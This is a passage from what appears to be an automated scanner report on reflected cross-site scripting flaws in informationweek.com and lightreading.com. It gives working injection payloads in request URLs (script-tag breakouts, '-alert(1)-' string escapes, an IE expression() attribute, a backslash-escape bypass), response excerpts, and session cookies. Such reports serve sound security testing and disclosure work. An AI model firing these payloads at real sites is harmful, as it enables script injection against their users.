<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/1d0d5'-alert(1)-'9aaa8d0ebc/Privacy/business-driven-access;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=660033644;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3af1c</script>7bfc2c6d31e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Privacy3af1c</script>7bfc2c6d31e/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:35 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:35 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30509
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Privacy3af1c</script>7bfc2c6d31e/business-driven-;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=313023278;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80485"%20a%3db%205ff5bb5c310 was submitted in the REST URL parameter 3. This input was echoed as 80485" a=b 5ff5bb5c310 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Privacy80485"%20a%3db%205ff5bb5c310/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30503
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Privacy80485" a=b 5ff5bb5c310/business-driven-acc;kvarticleid=;kvauthor=;loc=300;grp=143930602" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c59a3"><a%20b%3dc>e93b702473d was submitted in the REST URL parameter 4. This input was echoed as c59a3"><a b=c>e93b702473d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Privacy/c59a3"><a%20b%3dc>e93b702473d HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30189
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Privacy/c59a3"><a b=c>e93b702473d;kvarticleid=;kvauthor=;loc=300;grp=52091368" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71de5'-alert(1)-'515bb9dee72 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Privacy/71de5'-alert(1)-'515bb9dee72 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:46 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:46 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30223
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Privacy/71de5'-alert(1)-'515bb9dee72;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=813317067;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5171'-alert(1)-'5c4c640c20a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /e5171'-alert(1)-'5c4c640c20a/advancedSearch/resultsCollection.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:09 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:09 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30230
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/e5171'-alert(1)-'5c4c640c20a/advancedSearch/resultsCollect;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=376503650;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85369"%20style%3dx%3aexpression(alert(1))%2072142abc6e2 was submitted in the REST URL parameter 1. This input was echoed as 85369" style=x:expression(alert(1)) 72142abc6e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /85369"%20style%3dx%3aexpression(alert(1))%2072142abc6e2/advancedSearch/resultsCollection.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:06 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:06 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30299
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/85369" style=x:expression(alert(1)) 72142abc6e2/advancedSe;kvarticleid=;kvauthor=;loc=300;grp=115836270" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 312d8"%20a%3db%20ebf5838ee26 was submitted in the REST URL parameter 2. This input was echoed as 312d8" a=b ebf5838ee26 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/312d8"%20a%3db%20ebf5838ee26/resultsCollection.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:13 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:13 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30187
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/312d8" a=b ebf5838ee26/resultsCollection;kvarticleid=;kvauthor=;loc=300;grp=314329095" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f14f</script>f0ff90fd23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/6f14f</script>f0ff90fd23/resultsCollection.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:18 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:18 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30199
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/6f14f</script>f0ff90fd23/resultsCollection;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=996341790;misc='+new Date().getTime()+'"> ...[SNIP]...
3.793. http://www.lightreading.com/archives.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightreading.com
Path:
/archives.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f0f0"><script>alert(1)</script>176e537623 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /archives.asp?reportsqueue=yes&4f0f0"><script>alert(1)</script>176e537623=1 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:12:23 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:12:18 GMT Expires: Sun, 10 Apr 2011 19:12:18 GMT Etag: s200805.p200805 Content-Length: 239408 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... <a href="http://www.lightreading.com/archives.asp?reportsqueue=yes&4f0f0"><script>alert(1)</script>176e537623=1&piddl_archivepage=2"> ...[SNIP]...
The value of the section_name request parameter is copied into the HTML document as plain text between tags. The payload 174c7<a%20b%3dc>c63612801ca was submitted in the section_name parameter. This input was echoed as 174c7<a b=c>c63612801ca in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /archives.asp?section_id=18,145,225,224,402,751&section_name=Columns174c7<a%20b%3dc>c63612801ca HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:15:26 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:15:23 GMT Expires: Sun, 10 Apr 2011 19:15:23 GMT Etag: s200805.p200805 Content-Length: 232673 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... <span class="red big strong">Columns174c7<a b=c>c63612801ca</span> ...[SNIP]...
The value of the section_name request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4645\'%3bea759ddc404 was submitted in the section_name parameter. This input was echoed as c4645\\';ea759ddc404 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /archives.asp?section_id=18,145,225,224,402,751&section_name=Columnsc4645\'%3bea759ddc404 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:14:37 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:14:35 GMT Expires: Sun, 10 Apr 2011 19:14:35 GMT Etag: s200805.p200805 Content-Length: 232134 Cache-control: max-age=10368000, public
3.796. http://www.lightreading.com/blog.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightreading.com
Path:
/blog.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9a3c"><script>alert(1)</script>db793d3da66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog.asp?blog_sectionid=419&doc_id=180545&site=cdn&&c9a3c"><script>alert(1)</script>db793d3da66=1 HTTP/1.1 Host: www.lightreading.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lightreading%5Flastvisit=12%2F1%2F2010+8%3A11%3A47+PM; lightreading%5Fvisits=1; s_nr=1291273863933
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="AT&T, Cable modem termination systems (CMTSs), Cable Modems, Cisco, Comcast, Docsis, FTTx ...[SNIP]... <a href="http://www.lightreading.com/blog.asp?blog_sectionid=419&site=cdn&&c9a3c"><script>alert(1)</script>db793d3da66=1&doc_id=180545&piddl_msgorder=asc#msgs"> ...[SNIP]...
3.797. http://www.lightreading.com/document.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightreading.com
Path:
/document.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 701a7"><script>alert(1)</script>224ac81d999 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /document.asp?doc_id=173549&701a7"><script>alert(1)</script>224ac81d999=1 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:13:08 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET X-Pingback: http://www.lightreading.com/xmlrpc.asp Last-modified: Sat, 11 Dec 2010 23:13:04 GMT Expires: Sun, 10 Apr 2011 19:13:04 GMT Etag: s200805.p200805 Content-Length: 202346 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Cable/MSO equipment, Interactive advertising, Middleware & business support systems, TV, ...[SNIP]... <a href="http://www.lightreading.com/document.asp?doc_id=173549&701a7"><script>alert(1)</script>224ac81d999=1&piddl_msgorder=asc#msgs"> ...[SNIP]...
The value of the piddl_lg_pcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 402a9"><a%20b%3dc>7ead46494ae was submitted in the piddl_lg_pcode parameter. This input was echoed as 402a9"><a b=c>7ead46494ae in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /lg_redirect.asp?piddl_lgid_docid=201487&piddl_lg_pcode=rtcolelement402a9"><a%20b%3dc>7ead46494ae HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:16:07 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 154712 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Bandwidth, Geography, IMS, Mobile/Wireless, OSS, Policy control"> <META name="descriptio ...[SNIP]... <input type="hidden" id="piddl_lg_pcode" name="piddl_lg_pcode" value="rtcolelement402a9"><a b=c>7ead46494ae"> ...[SNIP]...
The value of the piddl_msg request parameter is copied into the HTML document as plain text between tags. The payload cf2d6<a%20b%3dc>4ff82f3cd94 was submitted in the piddl_msg parameter. This input was echoed as cf2d6<a b=c>4ff82f3cd94 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /login.asp?piddl_nexturl=http%3A%2F%2Fwww%2Elightreading%2Ecom%2Fblog%2Easp%3Fblog%5Fsectionid%3D419%26site%3Dcdn%26doc%5Fid%3D180545&piddl_msg=Please+login+to+rate+this%2Ecf2d6<a%20b%3dc>4ff82f3cd94 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:14:25 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 176873 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... <span class="red strong"> Please login to rate this.cf2d6<a b=c>4ff82f3cd94</span> ...[SNIP]...
The value of the Ticker request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34d4f'-alert(1)-'7ce94fc805c was submitted in the Ticker parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quote.asp?Account=lightreading&Page=QUOTE&Ticker=T34d4f'-alert(1)-'7ce94fc805c HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
